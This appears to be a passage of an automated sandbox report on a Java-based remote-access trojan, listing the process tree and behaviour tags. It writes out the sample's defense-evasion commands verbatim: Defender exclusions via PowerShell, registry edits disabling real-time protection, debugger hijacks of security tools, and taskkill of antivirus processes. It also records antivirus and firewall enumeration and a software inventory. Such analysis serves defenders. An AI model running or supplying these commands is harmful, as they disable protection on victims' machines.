PID 788 wrote to memory of 4256	788	java.exe	352
PID 788 wrote to memory of 4396	788	java.exe	354
PID 788 wrote to memory of 4396	788	java.exe	354
PID 788 wrote to memory of 4544	788	java.exe	356
PID 788 wrote to memory of 4544	788	java.exe	356

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
572	attrib.exe
3700	attrib.exe
2396	attrib.exe
2788	attrib.exe
2884	attrib.exe
3124	attrib.exe
3784	attrib.exe
496	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\QAOTATION.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:668
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3160
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3700
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:2396
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\oWsdf\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2788
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\oWsdf\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2884
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\oWsdf
  2⤵
  - Views/modifies file attributes
  PID:3124
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\oWsdf
  2⤵
  - Views/modifies file attributes
  PID:3784
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\oWsdf
  2⤵
  - Views/modifies file attributes
  PID:496
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class
  2⤵
  - Views/modifies file attributes
  PID:572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1244
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3904
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3516
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2468
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:752
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:948
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3820
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:2408
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2348
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3228
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4056
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1236
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:720
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2936
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2976
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1816
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1404
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:3032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:1808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3088
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3392
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:3440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1004
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2772
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4028
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:2424
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:3196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2764
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3896
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1708
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:3096
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:2144
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:3052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:2296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:3992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:3300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:3988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:2764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:3992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:3064
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:3720
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:3516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:3836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:3848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:3048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:3516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2040
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2040
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4332
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4408
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4636
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4712
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4944
- - C:\Windows\system32\reg.exe
